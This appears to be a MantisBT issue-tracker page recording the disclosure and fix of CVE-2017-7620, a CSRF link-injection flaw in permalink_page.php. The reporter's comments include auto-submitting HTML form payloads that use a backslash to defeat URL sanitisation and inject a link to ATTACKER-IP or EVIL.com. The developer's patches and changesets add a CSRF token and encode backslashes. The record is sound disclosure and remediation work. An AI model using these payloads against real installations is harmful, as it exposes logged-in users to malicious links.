View Issue Details

IDProjectCategoryView StatusLast Update
0022702mantisbtsecuritypublic2017-05-20 16:10
Reporterhyp3rlinxAssigned Todregad 
PriorityhighSeveritymajorReproducibilityhave not tried
Status closedResolutionfixed 
Product Version 
Target Version1.3.11Fixed in Version1.3.11 
Summary0022702: CVE-2017-7620: CSRF - Arbitrary Permalink Injection
Description

CSRF to Link Injection vulnerability.

e.g.

http://127.0.0.1/mantisbt-2.3.0/permalink_page.php?url=\/ATTACKER-IP

Post the following HTML on remote web server and visit while logged into mantisbt.

<form action="http://127.0.0.1/mantisbt-2.3.0/mantisbt-2.3.0/permalink_page.php?url=\/ATTACKER-IP" method="POST">
<script>document.forms[0].submit()</script>
</form>

OR

<form action="http://127.0.0.1/mantisbt-2.3.0/permalink_page.php?url=\/ATTACKER-IP%2Fmantisbt-2.3.0%2Fmantisbt-2.3.0%2Fsearch.php%3Fproject_id%3D1%26sticky%3Don%26sort%3Dlast_updated%26dir%3DDESC%26hide_status%3D90%26match_type%3D0" method="POST">
<script>document.forms[0].submit()</script>
</form>
Additional Information

Initially reported by John Page aka hyp3rlinx / ApparitionSec http://hyp3rlinx.altervista.org via e-mail

TagsNo tags attached.

Relationships

parent of 0022909 closeddregad CVE-2017-7620: CSRF - Arbitrary Permalink Injection 
related to 0022816 closeddregad CVE-2017-7620: Open redirection vulnerability in /login_page.php 

Activities

dregad

dregad

2017-04-10 10:02

developer   ~0056475

@hyp3rlinx I presume that you already requested a CVE ID ? Please post it here when it has been assigned.

hyp3rlinx

hyp3rlinx

2017-04-10 12:17

reporter   ~0056481

CVE-2017-7620

dregad

dregad

2017-04-10 18:21

developer   ~0056485

Last edited: 2017-04-10 18:21

View 2 revisions

@hyp3rlinx I don't see any link injection... The url parameter is processed by string_sanitize_url(), which ensures that it is part of the Mantis site; as a result, the printed link is not actually redirecting to the attacker's site:

  • if url=<ip>, it is treated as a relative to the mantisbt root (i.e. http://localhost/mantisbt/<ip>)
  • with an absolute url=http://<ip>, it is converted to index.php

Am I missing something ? If so, maybe you can explain what I'm doing wrong.

hyp3rlinx

hyp3rlinx

2017-04-10 20:35

reporter   ~0056486

Add this to a webpage on another server, login to mantis then visit the webpage. It works in 1.3.0 too. Attached is screenshot showing arbitrary link injection

<form action="http://MANTIS-VICTIM-IP/mantisbt-2.3.0/mantisbt-2.3.0/permalink_page.php?url=\/SOME_OTHER_DOMAIN"; method="POST">
<script>document.forms[0].submit()</script>
</form>



mantis-csrf-link.jpg (98,767 bytes)
mantis-csrf-link.jpg (98,767 bytes)
hyp3rlinx

hyp3rlinx

2017-04-10 20:37

reporter   ~0056487

Look at bottom left of browser in screenshot to see URL status after hovering over link. http://attacker-ip.

hyp3rlinx

hyp3rlinx

2017-04-10 20:39

reporter   ~0056488

URL needs a backslash %5C or '\' to break your sanitation routine. e.g. url=\/EVIL.com

dregad

dregad

2017-04-11 03:53

developer   ~0056489

Ah, I missed the backslash :-o
Thanks for the clarification !

dregad

dregad

2017-04-13 02:42

developer   ~0056523

Sorry for the delay, I've been busy. I can confirm problem reproduction by escaping the /, now I need to think about how to properly address this issue (not sure at this time if patching string_sanitize_url() is the best way to do it).

dregad

dregad

2017-04-13 19:06

developer   ~0056537

The identified vulnerability exists as far back as 1.2.0, and most likely long before that too; targeting at 1.3.10.

Proposed approach to fix the issue is to encode the \ as %5C in string_sanitize_url(). As far as I can tell, this fixes the issue without regression.

Please review attached patch.



0001-Encode-in-string_sanitize_url.patch (1,155 bytes)
From 35e78af20ba4bd5078934188635175d356f1e996 Mon Sep 17 00:00:00 2001
From: Damien Regad <dregad@mantisbt.org>
Date: Fri, 14 Apr 2017 00:47:13 +0200
Subject: [PATCH] Encode '\' in string_sanitize_url()

John Page aka hyp3rlinx / ApparitionSec http://hyp3rlinx.altervista.org
reported a CSRF vulnerability in permalink_page.php, allowing an
attacker to inject arbitrary links (CVE-2017-7620).

Encoding the backslashes in the 'script' part of the URL ensures that
the sanitized URL is treated as relative to MantisBT root and not a link
to an external site.

Fixes #22702
---
 core/string_api.php | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/core/string_api.php b/core/string_api.php
index 4e3c238..1c5e84b 100644
--- a/core/string_api.php
+++ b/core/string_api.php
@@ -275,7 +275,8 @@ function string_sanitize_url( $p_url, $p_return_absolute = false ) {
 	}
 
 	# Start extracting regex matches
-	$t_script = $t_matches['script'];
+	# Encode backslashes to prevent CSRF attacks
+	$t_script = strtr( $t_matches['script'], array( '\\' => '%5C' ) );
 	$t_script_path = $t_matches['path'];
 
 	# Clean/encode query params
-- 
2.7.4

dregad

dregad

2017-04-15 08:47

developer   ~0056561

@hyp3rlinx are you OK with the proposed patch ?

hyp3rlinx

hyp3rlinx

2017-04-15 13:06

reporter   ~0056567

basic tests seems to prevent valid URL being injected, but I do not see any CSRF token check your patch says "+ # Encode backslashes to prevent CSRF attacks" the CSRF still happens just the injection is now preceded with %5C.

hyp3rlinx

hyp3rlinx

2017-04-24 15:15

reporter   ~0056696

sent email last week for status update on this CSRF vulnerability but never heard back so I am follow up here.

dregad

dregad

2017-04-25 06:27

developer   ~0056703

Apologies for the lack of reply and delayed in resolving this issue, but due to work- and family-related priorities I had to put this aside. I will get back to it as soon as I can.

hyp3rlinx

hyp3rlinx

2017-04-25 20:28

reporter   ~0056711

Ok thanks for the update will check back with you soon.

hyp3rlinx

hyp3rlinx

2017-05-06 23:22

reporter   ~0056788

Checking back to see if fix is complete if not what is ETA, ... also just FYI Mantis passwords are stored using weak crypto MD5 and unsalted.

dregad

dregad

2017-05-07 03:48

developer   ~0056789

Checking back to see if fix is complete if not what is ETA

Funny you should ping me on that issue, as I actually resumed work on it yesterday.

passwords are stored using weak crypto MD5 and unsalted

Known issue, see 0022839. In fact, I've been working on that over the past few days, expanding on the work of a community contributor feel free to have a look at the pull request and let us know your feedback if you can spare the time.

dregad

dregad

2017-05-07 06:13

developer  

0001-Add-form-security-token-to-permalink_page.php.patch (2,026 bytes)
From 46e58463da2bb6726fc9c81abdffa2ed02b03865 Mon Sep 17 00:00:00 2001
From: Damien Regad <dregad@mantisbt.org>
Date: Sun, 7 May 2017 11:34:04 +0200
Subject: [PATCH] Add form security token to permalink_page.php

Prevent CSRF / link injection (CVE-2017-7620)

Fixes #22702
---
 core/filter_api.php | 5 ++++-
 permalink_page.php  | 4 ++++
 2 files changed, 8 insertions(+), 1 deletion(-)

diff --git a/core/filter_api.php b/core/filter_api.php
index ac6a630..bee19cd 100644
--- a/core/filter_api.php
+++ b/core/filter_api.php
@@ -2451,8 +2451,11 @@ function filter_draw_selection_area2( $p_page_number, $p_for_screen = true, $p_e
 							filter_print_view_type_toggle( $t_url, $t_filter['_view_type'] );
 
 							if( access_has_project_level( config_get( 'create_permalink_threshold' ) ) ) {
+								# Add CSRF protection, see #22702
+								$t_permalink_url = urlencode( filter_get_url( $t_filter ) )
+									. form_security_param( 'permalink' );
 								echo '<li>';
-								echo '<a href="permalink_page.php?url=' . urlencode( filter_get_url( $t_filter ) ) . '">';
+								echo '<a href="permalink_page.php?url=' . $t_permalink_url . '">';
 								echo '<i class="ace-icon fa fa-link"></i>&#160;&#160;' . lang_get( 'create_filter_link' );
 								echo '</a>';
 								echo '</li>';
diff --git a/permalink_page.php b/permalink_page.php
index 87a9058..b73ccab 100644
--- a/permalink_page.php
+++ b/permalink_page.php
@@ -36,6 +36,7 @@
 require_once( 'core.php' );
 require_api( 'access_api.php' );
 require_api( 'config_api.php' );
+require_api( 'form_api.php' );
 require_api( 'gpc_api.php' );
 require_api( 'html_api.php' );
 require_api( 'lang_api.php' );
@@ -43,6 +44,8 @@ require_api( 'print_api.php' );
 require_api( 'string_api.php' );
 require_api( 'utility_api.php' );
 
+form_security_validate( 'permalink' );
+
 layout_page_header();
 
 layout_page_begin();
@@ -75,4 +78,5 @@ if( !is_blank( $t_create_short_url ) ) {
 ?>
 </div>
 <?php
+form_security_purge( 'permalink' );
 layout_page_end();
-- 
2.7.4

dregad

dregad

2017-05-07 06:13

developer   ~0056790

basic tests seems to prevent valid URL being injected
the CSRF still happens just the injection is now preceded with %5C.

Escaping the backslash ensures that any external URL is redirected locally.
If there is no possibility for an attacker to inject an exploitable URL, isn't it sufficient protection ? I'm not a security expert, so maybe I'm missing something; is there some other consideration or attack vector that I don't see ?

I do not see any CSRF token check

Adding it is trivial (see attached patch), but is it truly necessary ?

dregad

dregad

2017-05-13 08:42

developer   ~0056845

@hyp3rlinx any feedback before I merge and make this public ?

hyp3rlinx

hyp3rlinx

2017-05-13 12:30

reporter   ~0056848

nope, when do you plan on making this public?

dregad

dregad

2017-05-13 18:04

developer   ~0056849

I can do it anytime, really - patches are ready. If you need some advance notice, let me know what your constraints are. If you don't have any, I'll do it sometime tomorrow.

I was kind of hoping for an answer on the questions I raised in 0022702:0056790 before moving forward, though.

hyp3rlinx

hyp3rlinx

2017-05-16 16:47

reporter   ~0056871

Just following up on this...

Related Changesets

MantisBT: master f21b56fa

2017-05-13 18:45:04

dregad

Details Diff
Add form security token to permalink_page.php

John Page aka hyp3rlinx / ApparitionSec http://hyp3rlinx.altervista.org
reported a CSRF vulnerability in permalink_page.php, allowing an
attacker to inject arbitrary links (CVE-2017-7620).

The security token prevents such injection.

Fixes 0022702
mod - core/filter_api.php Diff File
mod - permalink_page.php Diff File

MantisBT: master f6644090

2017-05-13 18:47:13

dregad

Details Diff
Encode '\' in string_sanitize_url()

As an extra safety measure following up on the fix for CVE-2017-7620, we
encode the backslashes in the 'script' part of the URL to ensure that
the sanitized URL is treated as a path relative to MantisBT root and not
a link to an external site if the URL begins with an escaped `/`.

This reduces the risk of someone being able to use the same attack
vector in another page.

Fixes 0022702, 0022816
mod - core/string_api.php Diff File

MantisBT: master 241ff4eb

2017-05-13 18:53:15

dregad

Details Diff
Add test for '\' encoding in in string_sanitize_url()

Issue 0022702
mod - tests/Mantis/StringTest.php Diff File

MantisBT: master-1.3.x c4f50e5d

2017-05-19 11:48:57

dregad

Details Diff
Fix CSRF vulnerability in permalink_page.php

John Page aka hyp3rlinx / ApparitionSec http://hyp3rlinx.altervista.org
reported a CSRF vulnerability in permalink_page.php, allowing an
attacker to inject arbitrary links (CVE-2017-7620).

Backporting from master branch:
- Add form security token to prevent such injection (code changed from
original commit) 0d11077d40c5dfdb76efdad9ba2b455af5be25a0
- Encode '\' in string_sanitize_url()
7b23377c573817c5fe8b522e8c33de8b1caff179

Fixes 0022702, 0022816
mod - core/filter_api.php Diff File
mod - core/string_api.php Diff File
mod - permalink_page.php Diff File
mod - tests/Mantis/StringTest.php Diff File

MantisBT: master-2.3 8b6787c8

2017-05-19 11:48:57

dregad

Details Diff
Fix CSRF vulnerability in permalink_page.php

John Page aka hyp3rlinx / ApparitionSec http://hyp3rlinx.altervista.org
reported a CSRF vulnerability in permalink_page.php, allowing an
attacker to inject arbitrary links (CVE-2017-7620).

Backporting from master branch:
- Add form security token to prevent such injection
0d11077d40c5dfdb76efdad9ba2b455af5be25a0
- Encode '\' in string_sanitize_url()
7b23377c573817c5fe8b522e8c33de8b1caff179

Fixes 0022702, 0022816
mod - core/filter_api.php Diff File
mod - core/string_api.php Diff File
mod - permalink_page.php Diff File
mod - tests/Mantis/StringTest.php Diff File

MantisBT: master-2.4 2d2309a3

2017-05-19 11:48:57

dregad

Details Diff
Fix CSRF vulnerability in permalink_page.php

John Page aka hyp3rlinx / ApparitionSec http://hyp3rlinx.altervista.org
reported a CSRF vulnerability in permalink_page.php, allowing an
attacker to inject arbitrary links (CVE-2017-7620).

Backporting from master branch:
- Add form security token to prevent such injection
0d11077d40c5dfdb76efdad9ba2b455af5be25a0
- Encode '\' in string_sanitize_url()
7b23377c573817c5fe8b522e8c33de8b1caff179

Fixes 0022702, 0022816
mod - core/filter_api.php Diff File
mod - core/string_api.php Diff File
mod - permalink_page.php Diff File
mod - tests/Mantis/StringTest.php Diff File

Issue History

Date Modified Username Field Change
2017-04-10 09:54 dregad New Issue
2017-04-10 09:55 dregad Reporter dregad => hyp3rlinx
2017-04-10 09:55 dregad Status new => acknowledged
2017-04-10 10:02 dregad Note Added: 0056475
2017-04-10 11:16 dregad View Status public => private
2017-04-10 12:17 hyp3rlinx Note Added: 0056481
2017-04-10 13:33 dregad Summary CSRF - Arbitrary Permalink Injection => CVE-2017-7620: CSRF - Arbitrary Permalink Injection
2017-04-10 18:21 dregad Note Added: 0056485
2017-04-10 18:21 dregad Note Edited: 0056485 View Revisions
2017-04-10 20:35 hyp3rlinx File Added: mantis-csrf-link.jpg
2017-04-10 20:35 hyp3rlinx Note Added: 0056486
2017-04-10 20:37 hyp3rlinx Note Added: 0056487
2017-04-10 20:39 hyp3rlinx Note Added: 0056488
2017-04-11 03:53 dregad Note Added: 0056489
2017-04-13 02:42 dregad Status acknowledged => confirmed
2017-04-13 02:42 dregad Note Added: 0056523
2017-04-13 18:32 dregad Assigned To => dregad
2017-04-13 18:32 dregad Status confirmed => assigned
2017-04-13 18:53 dregad Target Version => 1.3.10
2017-04-13 19:06 dregad File Added: 0001-Encode-in-string_sanitize_url.patch
2017-04-13 19:06 dregad Note Added: 0056537
2017-04-15 08:47 dregad Note Added: 0056561
2017-04-15 13:06 hyp3rlinx Note Added: 0056567
2017-04-16 19:29 dregad Target Version 1.3.10 => 1.3.11
2017-04-24 15:15 hyp3rlinx Note Added: 0056696
2017-04-25 06:27 dregad Note Added: 0056703
2017-04-25 20:28 hyp3rlinx Note Added: 0056711
2017-05-06 23:22 hyp3rlinx Note Added: 0056788
2017-05-07 03:48 dregad Note Added: 0056789
2017-05-07 06:13 dregad File Added: 0001-Add-form-security-token-to-permalink_page.php.patch
2017-05-07 06:13 dregad Note Added: 0056790
2017-05-07 06:26 dregad Relationship added related to 0022816
2017-05-13 08:42 dregad Note Added: 0056845
2017-05-13 12:30 hyp3rlinx Note Added: 0056848
2017-05-13 18:04 dregad Note Added: 0056849
2017-05-16 16:47 hyp3rlinx Note Added: 0056871
2017-05-20 07:24 dregad Changeset attached => MantisBT master-1.3.x c4f50e5d
2017-05-20 07:24 dregad Status assigned => resolved
2017-05-20 07:24 dregad Resolution open => fixed
2017-05-20 07:24 dregad Fixed in Version => 1.3.11
2017-05-20 07:24 dregad Changeset attached => MantisBT master-2.3 8b6787c8
2017-05-20 07:24 dregad Changeset attached => MantisBT master-2.4 2d2309a3
2017-05-20 07:24 dregad Changeset attached => MantisBT master f21b56fa
2017-05-20 07:24 dregad Changeset attached => MantisBT master f6644090
2017-05-20 07:24 dregad Changeset attached => MantisBT master 241ff4eb
2017-05-20 07:34 dregad View Status private => public
2017-05-20 07:44 dregad Issue cloned: 0022908
2017-05-20 07:45 dregad Issue cloned: 0022909
2017-05-20 07:45 dregad Relationship added parent of 0022909
2017-05-20 16:10 vboctor Status resolved => closed